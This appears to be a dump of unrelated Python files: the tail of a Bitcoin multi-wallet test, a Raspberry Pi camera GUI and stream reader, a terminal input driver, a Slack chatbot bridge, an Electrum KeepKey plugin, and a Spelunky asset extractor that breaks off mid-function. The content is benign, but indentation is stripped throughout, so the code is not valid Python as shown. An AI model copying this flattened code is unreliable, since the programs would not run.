assert_raises_rpc_error(-18, "No wallet is loaded. Load a wallet using loadwallet or create a new one with createwallet. (Note: A default wallet is no longer automatically created)", self.nodes[0].getwalletinfo)
# Successfully load a previously unloaded wallet
self.nodes[0].loadwallet('w1')
assert_equal(self.nodes[0].listwallets(), ['w1'])
assert_equal(w1.getwalletinfo()['walletname'], 'w1')
assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), sorted(in_wallet_dir))
# Test backing up and restoring wallets
self.log.info("Test wallet backup")
self.restart_node(0, ['-nowallet'])
for wallet_name in wallet_names:
self.nodes[0].loadwallet(wallet_name)
for wallet_name in wallet_names:
rpc = self.nodes[0].get_wallet_rpc(wallet_name)
addr = rpc.getnewaddress()
backup = os.path.join(self.options.tmpdir, 'backup.dat')
if os.path.exists(backup):
os.unlink(backup)
rpc.backupwallet(backup)
self.nodes[0].unloadwallet(wallet_name)
shutil.copyfile(empty_created_wallet if wallet_name == self.default_wallet_name else empty_wallet, wallet_file(wallet_name))
self.nodes[0].loadwallet(wallet_name)
assert_equal(rpc.getaddressinfo(addr)['ismine'], False)
self.nodes[0].unloadwallet(wallet_name)
shutil.copyfile(backup, wallet_file(wallet_name))
self.nodes[0].loadwallet(wallet_name)
assert_equal(rpc.getaddressinfo(addr)['ismine'], True)
# Test .walletlock file is closed
self.start_node(1)
wallet = os.path.join(self.options.tmpdir, 'my_wallet')
self.nodes[0].createwallet(wallet)
if self.options.descriptors:
assert_raises_rpc_error(-4, "Unable to obtain an exclusive lock", self.nodes[1].loadwallet, wallet)
else:
assert_raises_rpc_error(-4, "Error initializing wallet database environment", self.nodes[1].loadwallet, wallet)
self.nodes[0].unloadwallet(wallet)
self.nodes[1].loadwallet(wallet)
if __name__ == '__main__':
MultiWalletTest().main()
|
camerasection.py
|
from threading import Thread
from picamera.array import PiRGBArray
from PyQt5.QtWidgets import *
from PyQt5.QtCore import pyqtSignal, pyqtSlot
from PyQt5.QtGui import QPixmap, QImage, QIcon
from src.camerasettings import SettingsWindow, CameraSettingsButton
class PreviewWindow(QLabel):
def __init__(self, parent, camera):
super(PreviewWindow, self).__init__(parent)
# set preview window geometry
self.setFixedSize(640,480)
# announce camera object
self.camera = camera
# set no-feed image
self.goat = QImage('resources/goat-small.jpg')
self.setPixmap(QPixmap.fromImage(self.goat))
# set frame
self.setFrameShape(QFrame.Panel)
self.setLineWidth(1)
@pyqtSlot()
def start_preview_thread(self):
# set preview sentinel to true
self.camera.preview_state = True
# start preview pane thread
self.frames_thread = Thread(target = self.frame_getter)
self.frames_thread.start()
@pyqtSlot()
def stop_preview_thread(self):
# set preview state variable to false
self.camera.preview_state = False
# if thread started, wait for it to complete
self.frames_thread.join()
# set no-feed image
self.setPixmap(QPixmap.fromImage(self.goat))
def frame_getter(self):
# set up bit stream for catching frames
capturestream_array = PiRGBArray(self.camera, size = (640, 480))
for frame in self.camera.capture_continuous(capturestream_array, format="rgb", resize=(640, 480), use_video_port=True):
if self.camera.preview_state:
# grab the image array
img = frame.array
height, width, bpc = img.shape
bpl = bpc*width
image = QImage(img.data, width, height, bpl, QImage.Format_RGB888)
# use pixmap to update label (preview pane)
self.setPixmap(QPixmap.fromImage(image))
# clear the stream in preparation for the next frame
capturestream_array.truncate(0)
elif not self.camera.preview_state:
break
class PreviewButton(QPushButton):
# start and stop signals declaration
sig_start_thread = pyqtSignal()
sig_stop_thread = pyqtSignal()
def __init__(self, parent):
super(PreviewButton, self).__init__(QIcon('resources/play.svg'), ' Start Preview Feed', parent)
# announce parent to class and set initial button function to start preview
self.parent = parent
self.clicked.connect(self.start_preview)
def start_preview(self):
# start preview thread
self.sig_start_thread.emit()
# change text, icon and button function
self.clicked.disconnect()
self.setText(' Stop Preview Feed')
self.clicked.connect(self.stop_preview)
self.setIcon(QIcon('resources/square.svg'))
def stop_preview(self):
# stop preview thread
self.sig_stop_thread.emit()
# change text, icon and button function
self.clicked.disconnect()
self.setText(' Start Preview Feed')
self.clicked.connect(self.start_preview)
self.setIcon(QIcon('resources/play.svg'))
class SnapshotButton(QPushButton):
def __init__(self, parent, camera):
super(SnapshotButton, self).__init__(QIcon('resources/camera.svg'), ' Take Picture', parent)
# set initial button function to start preview
self.clicked.connect(camera.capture)
class CameraSection(QGroupBox):
def __init__(self, parent, camera):
super(CameraSection, self).__init__(parent)
# announce parent (main window)
self.main_window = parent
# get customised PiCamera instance
self.camera = camera
# initialise user interface
self.initUI()
def initUI(self):
# general settings
self.setTitle('Camera')
# preview section layout
sublayout_preview = QVBoxLayout()
# initialise widgets
self.previewwindow = PreviewWindow(self.main_window, self.camera)
self.previewbutton = PreviewButton(self.main_window)
self.snapshotbutton = SnapshotButton(self.main_window, self.camera)
self.settingsbutton = CameraSettingsButton(self.main_window, self.camera)
#~ self.cameraselection = QComboBox(self)
# add widgets to vertical box layout
sublayout_preview.addWidget(self.previewwindow)
sublayout_preview.addWidget(self.previewbutton)
sublayout_preview.addWidget(self.snapshotbutton)
sublayout_preview.addWidget(self.settingsbutton)
# set sublayout as widget layout
self.setLayout(sublayout_preview)
# connect signals to slots
self.sigslot_connector()
def sigslot_connector(self):
# connect capture preview buttons
self.previewbutton.sig_start_thread.connect(self.previewwindow.start_preview_thread)
self.previewbutton.sig_stop_thread.connect(self.previewwindow.stop_preview_thread)
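# Hedged usage sketch (not part of the original module), assuming an attached
# Pi camera and the resources/ icons referenced above. The extra preview_state
# flag mirrors the attribute PreviewWindow expects on the camera object; the
# helper name is illustrative.
def _demo_camera_section():
    import sys
    from picamera import PiCamera
    app = QApplication(sys.argv)
    camera = PiCamera()
    camera.preview_state = False  # assumption: sentinel checked by the preview thread
    window = QMainWindow()
    window.setCentralWidget(CameraSection(window, camera))
    window.show()
    sys.exit(app.exec_())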
|
threads.py
|
from picamera.array import PiRGBArray
from picamera import PiCamera
from threading import Thread
import cv2
# To handle reading threaded frames from the Raspberry Pi camera module
class PiVideoStream:
def __init__(self, resolution=(320, 240), framerate=32):
# initialize the camera and stream
self.camera = PiCamera()
self.camera.resolution = resolution
self.camera.framerate = framerate
self.rawCapture = PiRGBArray(self.camera, size=resolution)
self.stream = self.camera.capture_continuous(self.rawCapture,
format="bgr", use_video_port=True)
# initialize the frame and the variable used to indicate
# if the thread should be stopped
self.frame = None
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
for f in self.stream:
# grab the frame from the stream and clear the stream in
# preparation for the next frame
self.frame = f.array
self.rawCapture.truncate(0)
# if the thread indicator variable is set, stop the thread
# and release camera resources
if self.stopped:
self.stream.close()
self.rawCapture.close()
self.camera.close()
return
def read(self):
# return the frame most recently read
return self.frame
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
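# Hedged usage sketch (not part of the original module): poll the threaded
# stream for a little while and then release the camera. The helper name and
# frame count are illustrative; an attached Pi camera is assumed.
def _demo_stream(num_frames=100):
    vs = PiVideoStream(resolution=(320, 240), framerate=32).start()
    for _ in range(num_frames):
        frame = vs.read()  # most recent frame; may be None until the first capture
        cv2.waitKey(10)    # small pause so the capture thread can keep up
    vs.stop()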
|
linux_driver.py
|
from __future__ import annotations
import asyncio
import os
from codecs import getincrementaldecoder
import selectors
import signal
import sys
import termios
import tty
from typing import Any, TYPE_CHECKING
from threading import Event, Thread
if TYPE_CHECKING:
from rich.console import Console
from .. import log
from .. import events
from ..driver import Driver
from ..geometry import Size
from .._types import MessageTarget
from .._xterm_parser import XTermParser
from .._profile import timer
class LinuxDriver(Driver):
"""Powers display and input for Linux / MacOS"""
def __init__(self, console: "Console", target: "MessageTarget") -> None:
super().__init__(console, target)
self.fileno = sys.stdin.fileno()
self.attrs_before: list[Any] | None = None
self.exit_event = Event()
self._key_thread: Thread | None = None
def _get_terminal_size(self) -> tuple[int, int]:
width: int | None = 80
height: int | None = 25
try:
width, height = os.get_terminal_size(sys.__stdin__.fileno())
except (AttributeError, ValueError, OSError):
try:
width, height = os.get_terminal_size(sys.__stdout__.fileno())
except (AttributeError, ValueError, OSError):
pass
width = width or 80
height = height or 25
return width, height
def _enable_mouse_support(self) -> None:
write = self.console.file.write
write("\x1b[?1000h") # SET_VT200_MOUSE
write("\x1b[?1003h") # SET_ANY_EVENT_MOUSE
write("\x1b[?1015h") # SET_VT200_HIGHLIGHT_MOUSE
write("\x1b[?1006h") # SET_SGR_EXT_MODE_MOUSE
# write("\x1b[?1007h")
self.console.file.flush()
# Note: E.g. lxterminal understands 1000h, but not the urxvt or sgr
# extensions.
def _disable_mouse_support(self) -> None:
write = self.console.file.write
write("\x1b[?1000l") #
write("\x1b[?1003l") #
write("\x1b[?1015l")
write("\x1b[?1006l")
self.console.file.flush()
def start_application_mode(self):
loop = asyncio.get_event_loop()
def on_terminal_resize(signum, stack) -> None:
terminal_size = self._get_terminal_size()
width, height = terminal_size
event = events.Resize(self._target, Size(width, height))
self.console.size = terminal_size
asyncio.run_coroutine_threadsafe(
self._target.post_message(event),
loop=loop,
)
signal.signal(signal.SIGWINCH, on_terminal_resize)
self.console.set_alt_screen(True)
self._enable_mouse_support()
try:
self.attrs_before = termios.tcgetattr(self.fileno)
except termios.error:
# Ignore attribute errors.
self.attrs_before = None
try:
newattr = termios.tcgetattr(self.fileno)
except termios.error:
pass
else:
newattr[tty.LFLAG] = self._patch_lflag(newattr[tty.LFLAG])
newattr[tty.IFLAG] = self._patch_iflag(newattr[tty.IFLAG])
# VMIN defines the number of characters read at a time in
# non-canonical mode. It seems to default to 1 on Linux, but on
# Solaris and derived operating systems it defaults to 4. (This is
# because the VMIN slot is the same as the VEOF slot, which
# defaults to ASCII EOT = Ctrl-D = 4.)
newattr[tty.CC][termios.VMIN] = 1
termios.tcsetattr(self.fileno, termios.TCSANOW, newattr)
self.console.show_cursor(False)
self.console.file.write("\033[?1003h\n")
self.console.file.flush()
self._key_thread = Thread(
target=self.run_input_thread, args=(asyncio.get_event_loop(),)
)
width, height = self.console.size = self._get_terminal_size()
asyncio.run_coroutine_threadsafe(
self._target.post_message(events.Resize(self._target, Size(width, height))),
loop=loop,
)
self._key_thread.start()
@classmethod
def _patch_lflag(cls, attrs: int) -> int:
return attrs & ~(termios.ECHO | termios.ICANON | termios.IEXTEN | termios.ISIG)
@classmethod
def _patch_iflag(cls, attrs: int) -> int:
return attrs & ~(
# Disable XON/XOFF flow control on output and input.
# (Don't capture Ctrl-S and Ctrl-Q.)
# Like executing: "stty -ixon."
termios.IXON
| termios.IXOFF
|
# Don't translate carriage return into newline on input.
termios.ICRNL
| termios.INLCR
| termios.IGNCR
)
def disable_input(self) -> None:
try:
if not self.exit_event.is_set():
signal.signal(signal.SIGWINCH, signal.SIG_DFL)
self._disable_mouse_support()
termios.tcflush(self.fileno, termios.TCIFLUSH)
self.exit_event.set()
if self._key_thread is not None:
self._key_thread.join()
except Exception as error:
# TODO: log this
pass
def stop_application_mode(self) -> None:
self.disable_input()
if self.attrs_before is not None:
try:
termios.tcsetattr(self.fileno, termios.TCSANOW, self.attrs_before)
except termios.error:
pass
with self.console:
self.console.set_alt_screen(False)
self.console.show_cursor(True)
def run_input_thread(self, loop) -> None:
try:
self._run_input_thread(loop)
except Exception:
pass # TODO: log
def _run_input_thread(self, loop) -> None:
selector = selectors.DefaultSelector()
selector.register(self.fileno, selectors.EVENT_READ)
fileno = self.fileno
def more_data() -> bool:
"""Check if there is more data to parse."""
for key, events in selector.select(0.01):
if events:
return True
return False
parser = XTermParser(self._target, more_data)
utf8_decoder = getincrementaldecoder("utf-8")().decode
decode = utf8_decoder
read = os.read
try:
while not self.exit_event.is_set():
selector_events = selector.select(0.1)
for _selector_key, mask in selector_events:
if mask & selectors.EVENT_READ:
unicode_data = decode(read(fileno, 1024))
for event in parser.feed(unicode_data):
self.process_event(event)
except Exception as error:
log(error)
finally:
with timer("selector.close"):
selector.close()
if __name__ == "__main__":
from time import sleep
from rich.console import Console
from .. import events
console = Console()
from ..app import App
class MyApp(App):
async def on_mount(self, event: events.Mount) -> None:
self.set_timer(5, callback=self.close_messages)
MyApp.run()
|
message.py
|
# coding:utf-8
import time
import json
import base64
import re
import hmac
import hashlib
from multiprocessing import Process
import requests
import slack
from flask import Response
from settings import CHATBOT_ENDPOINT, CHATBOT_SECRET_KEY
from modules import team_manager
def handle_message(event_data):
team = team_manager.get_team(event_data['team_id'])
# In case the app doesn't have access to the OAuth token
if team is None:
print('ERROR: Authenticate the App!')
return Response(status=200)
message = event_data['event']
# Ignore messages sent by the bot itself.
if message['user'] == team.bot_user_id:
return Response(status=200)
if message.get('subtype') is not None:
return Response(status=200)
process = Process(target=background_task, args=(team, message))
process.start()
return Response(status=200)
def background_task(team, message):
user_id = message['user']
# remove mention
text = re.sub('<@[^>]+>', '', message['text'])
# request chatbot
chatbot_response = _request_chatbot(team.id, user_id, text)
# response to user
_send_message_each_format(team.access_token, message['channel'], user_id, chatbot_response)
return
def _send_message_each_format(access_token, channel, user_id, chatbot_response):
client = slack.WebClient(token=access_token)
bubbles = chatbot_response['bubbles']
# send messages formatted for Slack to the user.
for bbl in bubbles:
if bbl['type'] == 'text' and 'quickButtons' in chatbot_response.keys():
# Form (Quick reply)
pass
elif bbl['type'] == 'template':
# Form (Multiple choice button)
# Multilink
# image
pass
elif bbl['type'] == 'carousel':
# image + text
for card in bbl['data']['cards']:
# _send_message_each_format(access_token, channel, user_id, chatbot_response)
cover = card['data']['cover']
for content in card['data']['contentTable']:
pass
else:
# default
content = bbl['data']['description']
message = '<@%s> %s' % (user_id, content)
client.chat_postMessage(channel=channel, text=message)
def _request_chatbot(team_id, user_id, text):
userId = '{team_id},{user_id}'.format(team_id=team_id, user_id=user_id)
request_body = {
'version': 'v2',
'userId': userId,
'timestamp': _get_timestamp(),
'bubbles': [{
'type': 'text',
'data': {'description': text}
}],
'event': 'send'
}
## Request body
encode_request_body = json.dumps(request_body).encode('UTF-8')
## make signature
signature = _make_signature(CHATBOT_SECRET_KEY, encode_request_body)
## headers
custom_headers = {
'Content-Type': 'application/json;UTF-8',
'X-NCP-CHATBOT_SIGNATURE': signature
}
chatbot_response = requests.post(headers=custom_headers, url=CHATBOT_ENDPOINT, data=json.dumps(request_body))
return chatbot_response.json()
def _get_timestamp():
timestamp = int(time.time() * 1000)
return timestamp
def _make_signature(secret_key, request_body):
secret_key_bytes = bytes(secret_key, 'UTF-8')
signing_key = base64.b64encode(hmac.new(secret_key_bytes, request_body, digestmod=hashlib.sha256).digest())
return signing_key
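# Hedged verification sketch (not part of the original module): the request is
# signed with HMAC-SHA256 over the raw body and base64-encoded, so a receiver
# holding the same secret could check it like this. The function and parameter
# names are illustrative.
def _verify_signature(secret_key, request_body, received_signature):
    expected = _make_signature(secret_key, request_body)
    return hmac.compare_digest(expected, received_signature)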
|
keepkey.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum_xsh.util import bfh, bh2u, UserCancelled
from electrum_xsh.bitcoin import (b58_address_to_hash160, xpub_from_pubkey,
TYPE_ADDRESS, TYPE_SCRIPT,
is_segwit_address)
from electrum_xsh import constants
from electrum_xsh.i18n import _
from electrum_xsh.plugins import BasePlugin
from electrum_xsh.transaction import deserialize, Transaction
from electrum_xsh.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum_xsh.wallet import Standard_Wallet
from electrum_xsh.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
hw_type = 'keepkey'
device = 'KeepKey'
def get_derivation(self):
return self.derivation
def is_segwit(self):
return self.derivation.startswith("m/49'/")
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise Exception(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class KeepKeyPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
firmware_URL = 'https://www.keepkey.com'
libraries_URL = 'https://github.com/keepkey/python-keepkey'
minimum_firmware = (1, 0, 0)
keystore_class = KeepKey_KeyStore
SUPPORTED_XTYPES = ('standard', )
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
from . import client
import keepkeylib
import keepkeylib.ckd_public
import keepkeylib.transport_hid
self.client_class = client.KeepKeyClient
self.ckd_public = keepkeylib.ckd_public
self.types = keepkeylib.client.types
self.DEVICE_IDS = keepkeylib.transport_hid.DEVICE_IDS
self.device_manager().register_devices(self.DEVICE_IDS)
self.libraries_available = True
except ImportError:
self.libraries_available = False
def hid_transport(self, pair):
from keepkeylib.transport_hid import HidTransport
return HidTransport(pair)
def _try_hid(self, device):
self.print_error("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.print_error("cannot connect at", device.path, str(e))
return None
def create_client(self, device, handler):
transport = self._try_hid(device)
if not transport:
self.print_error("cannot connect to device")
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
handler.show_error(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "SHIELD"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
traceback.print_exc(file=sys.stderr)
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise Exception(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True, keystore.is_segwit())
outputs = self.tx_outputs(keystore.get_derivation(), tx, keystore.is_segwit())
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
if type(wallet) is not Standard_Wallet:
keystore.handler.show_error(_('This function is only available for standard wallets when using {}.').format(self.device))
return
client = self.get_client(wallet.keystore)
if not client.atleast_version(1, 3):
wallet.keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = wallet.keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
segwit = wallet.keystore.is_segwit()
script_type = self.types.SPENDP2SHWITNESS if segwit else self.types.SPENDADDRESS
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
def tx_inputs(self, tx, for_sig=False, segwit=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = "\0"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
txinputtype.script_type = self.types.SPENDP2SHWITNESS if segwit else self.types.SPENDADDRESS
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, bfh(x_pubkey))
s = []
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=s)
pubkeys = map(f, x_pubkeys)
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
m=txin.get('num_sig'),
)
script_type = self.types.SPENDP2SHWITNESS if segwit else self.types.SPENDMULTISIG
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx, segwit=False):
def create_output_by_derivation(info):
index, xpubs, m = info
if len(xpubs) == 1:
script_type = self.types.PAYTOP2SHWITNESS if segwit else self.types.PAYTOADDRESS
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
script_type = self.types.PAYTOP2SHWITNESS if segwit else self.types.PAYTOMULTISIG
address_n = self.client_class.expand_path("/%d/%d" % index)
nodes = map(self.ckd_public.deserialize, xpubs)
pubkeys = [self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = address[2:]
elif _type == TYPE_ADDRESS:
if is_segwit_address(address):
txoutputtype.script_type = self.types.PAYTOWITNESS
else:
addrtype, hash_160 = b58_address_to_hash160(address)
if addrtype == constants.net.ADDRTYPE_P2PKH:
txoutputtype.script_type = self.types.PAYTOADDRESS
elif addrtype == constants.net.ADDRTYPE_P2SH:
txoutputtype.script_type = self.types.PAYTOSCRIPTHASH
else:
raise Exception('addrtype: ' + str(addrtype))
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for _type, address, amount in tx.outputs():
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation(info)
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
assets.py
|
import binascii
import logging
import os
import shutil
import threading
from concurrent.futures import ThreadPoolExecutor, wait
from pathlib import Path
from flask import Blueprint, current_app, render_template, request
from s2_data.assets.assets import (EXTRACTED_DIR, KNOWN_ASSETS, OVERRIDES_DIR,
AssetStore, MissingAsset)
from s2_data.assets.patcher import Patcher
blueprint = Blueprint("assets", __name__)
ASSETS_ROOT = Path("Mods")
EXTRACTED_DIR = ASSETS_ROOT / EXTRACTED_DIR
OVERRIDES_DIR = ASSETS_ROOT / OVERRIDES_DIR
ASSET_DIRS = [
"Data/Fonts",
"Data/Levels/Arena",
"Data/Textures/OldTextures"
]
def get_overrides(install_dir):
dir_ = install_dir / OVERRIDES_DIR
if not dir_.exists():
return None
overrides = []
for root, dirs, files in os.walk(dir_, topdown=True):
dirs[:] = [d for d in dirs if d not in [".compressed"]]
for file_ in files:
overrides.append(Path(root) / file_)
return overrides
@blueprint.route('/')
def assets():
exes = []
# Don't recurse forever. 3 levels should be enough
exes.extend(current_app.config.SPELUNKY_INSTALL_DIR.glob("*.exe"))
exes.extend(current_app.config.SPELUNKY_INSTALL_DIR.glob("*/*.exe"))
exes.extend(current_app.config.SPELUNKY_INSTALL_DIR.glob("*/*/*.exe"))
exes = [
exe.relative_to(current_app.config.SPELUNKY_INSTALL_DIR)
for exe in exes
if exe.name not in ["modlunky2.exe"]
]
overrides = get_overrides(current_app.config.SPELUNKY_INSTALL_DIR)
return render_template("assets.html", exes=exes, overrides=overrides)
def extract_assets(install_dir, exe_filename):
# Make all directories for extraction and overrides
for dir_ in ASSET_DIRS:
(install_dir / EXTRACTED_DIR / dir_).mkdir(parents=True, exist_ok=True)
(install_dir / EXTRACTED_DIR / ".compressed" / dir_).mkdir(
parents=True, exist_ok=True)
(install_dir / OVERRIDES_DIR / dir_).mkdir(parents=True, exist_ok=True)
(install_dir / OVERRIDES_DIR / ".compressed" / dir_).mkdir(
parents=True, exist_ok=True)
with exe_filename.open('rb') as exe:
asset_store = AssetStore.load_from_file(exe)
seen = {}
for filename in KNOWN_ASSETS:
asset = asset_store.find_asset(filename)
name_hash = asset_store.filename_hash(filename)
if asset is None:
logging.info(
"Asset %s not found with hash %s...",
filename.decode(),
repr(binascii.hexlify(name_hash))
)
continue
asset.filename = filename
seen[asset.name_hash] = asset
filepath = Path(filename.decode())
